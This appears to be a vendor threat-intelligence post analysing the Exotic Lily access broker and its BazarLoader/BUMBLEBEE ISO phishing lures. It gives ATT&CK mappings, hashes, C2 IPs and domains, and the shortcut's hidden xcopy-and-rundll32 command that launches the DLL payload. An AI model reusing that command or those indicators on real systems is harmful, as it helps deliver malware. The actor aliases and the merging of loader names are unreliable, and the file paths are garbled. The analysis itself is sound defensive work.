Bazarloader & Exotic Lily Analysis

In the month of September 2021, Google TAG researchers discovered a financially motivated threat actor, Exotic LILY. These threat actors were exploiting zero-days in Microsoft’s MSHTML (CVE-2021-40444) Exotic Lily is an Initial access broker. These threat actors specialize in breaching a company and then selling the access to the highest bidder, and among the interested parties who bid for the same were Conti and Diavol ransomware groups. To breach such companies, it was observed that Exotic Lily was using mass emailing/spoofing campaigns (5000+ emails per day) to attack more than 600 companies. Exotic Lily shifted its focus from IT, Healthcare, and cybersecurity companies to a broader spectrum of companies. Exotic Lily has an unusual level of human interaction while performing these campaigns. Based on the working hours of the group, it can be concluded that the group was from the Eastern/Central European region.

Exotic Lily is also known by these names:

• Wizard Spider by Crowdstrike
• DEV-0193 by Microsoft
• FIN12 by Mandiant

A few days ago, Google TAG Researchers spotted ISO files being used as malware delivery methods. These were specifically made to deliver Bazaar loader DLL files. File transfer services like OneDrive, TransferNow, and WeTransfer were used to send out these malicious ISO files as attachments in the mass email campaigning. The malware is called BUMBLEBEE because it uses a unique user agent, “bumblebee”. BUMBLEBEE uses Windows Management Instrumentation to collect the system data and then exfiltrate the data in a JSON format. Once this is done, the malware waits for commands from the CNC server. It was also noticed that the CNC server deploys a Cobalt Strike payload. Exotic Lily used identity spoofing to make fake domains of legitimate businesses by replacing TLD with “.us”, “.co”, or “.biz”. Then the attackers would pose as real company employees by copying their data from sites like LinkedIn, RocketReach, and Crunchbase. This slide states the initial contact between the attackers and the victims.

The MITRE ATT&CK TTPs used by the threat actor:

• Initial Access ID: TA0001
  • Phishing ID: T1566
    • Phishing: Spearphishing Attachment ID: T1566.001
• Execution ID: TA0002
  • User Execution ID: T1204
    • Malicious File ID: T1204.002
  • Windows Management Instrumentation ID: T1047
  • Command and Scripting Interpreter ID: T1059
    • Windows Command Shell ID: T1059.003
• Privilege Escalation ID: TA0004
  • Exploitation for Privilege Escalation ID: T1068
• Exfiltration ID: TA0010
  • Exfiltration Over C2 Channel ID: T1041

Sample: BazarLoader ISO.iso

SHA256:9fdec91231fe3a709c8d4ec39e25ce8c55282167c561b14917b52701494ac269 Mounting the ISO file gives us 2 files.

1. Attachments.lnk
2. DumpStack.log

Sample: Attachments.lnk

SHA256:6497223d35530f2e510382aa1866b83ffaf215213b8080b7ecb299b6e7e3e6b1 At first the Attachment file looks like a shortcut, nothing wrong, huh? When we opened the shortcuts panel, we discovered the target field with some command. C:WindowsSystem32cmd.exe /c xcopy /y DumpStack.log c:programdata && C:WindowsSystem32rundll32.exe C:programdataDumpStack.log,spload && exit

Processes that were started after clicking the attachment.lnk file

• C:Windowssystem32cmd.exe cmd /c C:UsersuserAppDataLocalTempAttachments.lnk
  • C:WindowsSystem32cmd.exe C:WindowsSystem32cmd.exe" /c xcopy /y DumpStack.log c:programdata && C:WindowsSystem32rundll32.exe C:programdataDumpStack.log,spload && exit
    • C:Windowssystem32xcopy.exe xcopy /y DumpStack.log c:programdata
    • C:WindowsSystem32rundll32.exe C:WindowsSystem32rundll32.exe C:programdataDumpStack.log,spload

Sample: DumpStack.log

SHA256:4bc9368951402ceeeb84da58c82e02a4ea9e09f5a4425daf5094ea5d87a14e9a Compiler time stamp: Tue Jan 18 13:47:09 2022 UTC

Doing a file command on the DumpStack.log file tells us it is an executable file for Windows.

file DumpStack.log DumpStack.log: PE32+ executable (DLL) (GUI) x86-64, for MS Windows Exports by the pe file as indicated by pestudio. FRdCdoy8j LcG8EAd0FAZYIxP spload ------> Function called by the DumpStack.log file. wsscUWQIzudQGV zzKKJMT02C

IP connections made by the malware while executing the DumpStack.log

23.81.246[.]187 185.52.0[.]55 89.163.140[.]67 198.50.135[.]212 45.76.254[.]23 107.174.68[.]120 194.36.144[.]87 51.89.88[.]77 95.217.190[.]236

Domain connections made by the malware:

3conlfex[.]com avrobio[.]co elemblo[.]com phxmfg[.]co modernmeadow[.]co lsoplexis[.]com craneveyor[.]us faustel[.]us lagauge[.]us missionbio[.]us richllndmetals[.]com kvnational[.]us prmflltration[.]com brightlnsight[.]co belcolnd[.]com awsblopharma[.]com amevida[.]us revergy[.]us al-ghurair[.]us opontia[.]us bluehail[.]bazar whitestorm9p[.]bazar reddew28c[.]bazar

BazarLoader ISO samples:

5ceb28316f29c3912332065eeaaebf59f10d79cd9388ef2a7802b9bb80d797be 9fdec91231fe3a709c8d4ec39e25ce8c55282167c561b14917b52701494ac269 c896ee848586dd0c61c2a821a03192a5efef1b4b4e03b48aba18eedab1b864f7

Recent BUMBLEBEE ISO samples:

9eacade8174f008c48ea57d43068dbce3d91093603db0511467c18252f60de32 6214e19836c0c3c4bc94e23d6391c45ad87fdd890f6cbd3ab078650455c31dc8 201c4d0070552d9dc06b76ee55479fc0a9dfacb6dbec6bbec5265e04644eebc9 1fd5326034792c0f0fb00be77629a10ac9162b2f473f96072397a5d639da45dd 01cc151149b5bf974449b00de08ce7dbf5eca77f55edd00982a959e48d017225

Virus total graph for the summary of the malware:

References

https://www.trmlabs.com/post/analysis-corroborates-suspected-ties-between-conti-and-ryuk-ransomware-groups-and-wizard-spider https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/ https://www.virustotal.com/gui/collection/55ef10a1ff5363ec2272ba135e7974fcfda7fc7989e84e65dfb76797a165c3f5

Prevent Ransomware with BreachSeeker & Threat Vulnerability Management

VerSprite’s Threat Intelligence Group provides organizations real-time threat monitoring, analysis, prevention recommendations, and mitigation. Our elite team works with companies across all industries and security maturity levels to defend against threats. For more information on Versprite’s Threat Intel Group or our botnet detection service, BreachSeeker, contact one of our security advisers today. Learn More →